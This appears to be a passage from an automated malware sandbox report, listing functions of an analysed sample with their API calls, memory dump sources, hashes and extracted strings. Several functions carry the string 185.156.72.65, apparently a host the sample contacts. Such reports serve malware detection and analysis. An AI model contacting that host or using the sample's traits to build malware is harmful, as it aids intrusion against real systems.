                    • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                    • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                    • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                    • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                    Function 0495C307 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RtlEncodePointer.NTDLL(00000000), ref: 0495C32C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 2118026453-2084237596
                    • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                    • Instruction ID: 469ca81cc88efd7d276d9fe38d2634b47bf2dc2cc48431cd51c1df6cbec78555
                    • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                    • Instruction Fuzzy Hash: BD412872900209AFDF16DF98C981EEEBBB9BF48304F248169FD15A7225D335A950DF50
                    Function 00401000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00401084
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 2296764815-2656946096
                    • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                    • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                    • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                    • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                    Function 00401110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00401194
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 2296764815-2656946096
                    • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                    • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                    • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                    • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                    Function 00401220 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 004012A4
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 2296764815-2656946096
                    • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                    • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                    • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                    • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                    Function 04951487 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 0495150B
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 4132704954-2656946096
                    • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                    • Instruction ID: b68f67b4c00690e181e770163d78a84ca3d00b31a65fe517a41e0cacc1b0a450
                    • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                    • Instruction Fuzzy Hash: 6521D4B4F002059AEB24EFB8E9157A87BB0AF05308FA141B9C9239B2B1D7756506CB59
                    Function 04951267 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 049512EB
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 4132704954-2656946096
                    • Opcode ID: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                    • Instruction ID: 9e702a3d0036c6607689573dba1b7483ecbe6d04646fe19d8000a92ab8bf8a80
                    • Opcode Fuzzy Hash: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                    • Instruction Fuzzy Hash: 5A2137B0F00245DEEB14EFA8E9167A87BB0EB01308FA00179D84567360D7B56549CB5D
                    Function 04951377 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 049513FB
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 4132704954-2656946096
                    • Opcode ID: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                    • Instruction ID: a02c709b0203582cfdba942107a8ff52fd0862dd8be4265b390dd0447ed87fa5
                    • Opcode Fuzzy Hash: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                    • Instruction Fuzzy Hash: 9321F5B0F00244DAEB24EFA4E9257A87BB0EF41308FA002B9DC055B260D7B56545CB59
                    Function 00408480 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 004084EE
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: G@ZK$[@G_
                    • API String ID: 2296764815-2338778587
                    • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                    • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                    • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                    • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                    Function 00407E80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00407EEE
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: G@ZK$[@G_
                    • API String ID: 2296764815-2338778587
                    • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                    • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                    • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                    • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                    Function 049586E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04958755
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: G@ZK$[@G_
                    • API String ID: 4132704954-2338778587
                    • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                    • Instruction ID: b6d9e5f69eea9796bea2d87498c86624bd5840650b0f6347fdc5e806259f9cb9
                    • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                    • Instruction Fuzzy Hash: 4D01D6B0F00244DFDB10EFB8AC41969B7B0A759314BB00679D936AB2A0DB75B9058B45
                    Function 049580E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04958155
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: G@ZK$[@G_
                    • API String ID: 4132704954-2338778587
                    • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                    • Instruction ID: 70e303a494107c807b5c4bbdc7990226a0e9e82326240ab6145931cc99123ab7
                    • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                    • Instruction Fuzzy Hash: 0001D6F1F41204DBE720EFA8AC41A69B7B0AB59314FB006B9E91957370DB3568458B45
                    Function 00407830 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00407899
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: @G@K$A@K.
                    • API String ID: 2296764815-2457859030
                    • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                    • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                    • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                    • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                    Function 00407940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 004079A9
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: @G@K$ZYA.
                    • API String ID: 2296764815-4236202813
                    • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                    • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                    • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                    • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D
                    Function 00406DD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00406E39
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: ZF\K$three
                    • API String ID: 2296764815-3094064056
                    • Opcode ID: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                    • Instruction ID: 29344792781c46cc919c6541bc41426b34b2da4dd82bbb0e7b349b67a9b0c42f
                    • Opcode Fuzzy Hash: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                    • Instruction Fuzzy Hash: DF01D134F04204DBCB20DFA9E882B9CB3B0EB04314FA0017AED06A7391DA385D42DB4D
                    Function 04957037 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 049570A0
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: ZF\K$three
                    • API String ID: 4132704954-3094064056
                    • Opcode ID: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                    • Instruction ID: 60cf2a7dc68a29c70edabd6d98aedb78c32db83a2db6c897080f8ef949d90416
                    • Opcode Fuzzy Hash: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                    • Instruction Fuzzy Hash: BF016974F04208EBDB20DFE9E981B4CB3B0AB54754FB041BADD15A73A0D6746A06DB19
                    Function 04957A97 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04957B00
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: @G@K$A@K.
                    • API String ID: 4132704954-2457859030
                    • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                    • Instruction ID: 38221bc8e8a54746fba994961db8364b5d67c5f54a5ce43662c162bd3be8d830
                    • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                    • Instruction Fuzzy Hash: 320181B0F00204DFD720DFA8E946A5C77B0E749304FB001BADD16A73A0D775AA458B59
                    Function 04957BA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04957C10
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: @G@K$ZYA.
                    • API String ID: 4132704954-4236202813
                    • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                    • Instruction ID: 1213575038c523a82ef544637b8d7b5647d95631f7cf84cebd34dcb3e32a8c94
                    • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                    • Instruction Fuzzy Hash: CF018174F00304DFDB24EFA8E991A5C7BF0AB44314FA041BADD2557360D6757945CB49
                    Function 00406C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00406C99
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: CGV.$mix
                    • API String ID: 2296764815-1644454629
                    • Opcode ID: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                    • Instruction ID: 24033b3836d6b4f620cd462d172ded2aeb793c2235c3ef6269eb5d899298d204
                    • Opcode Fuzzy Hash: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                    • Instruction Fuzzy Hash: 2AF062B0F082049BDB10EBA9E982E5877A0AB45314FA4017AE906A77D2D6386D418B5D
                    Function 04956EA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04956F00
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: CGV.$mix
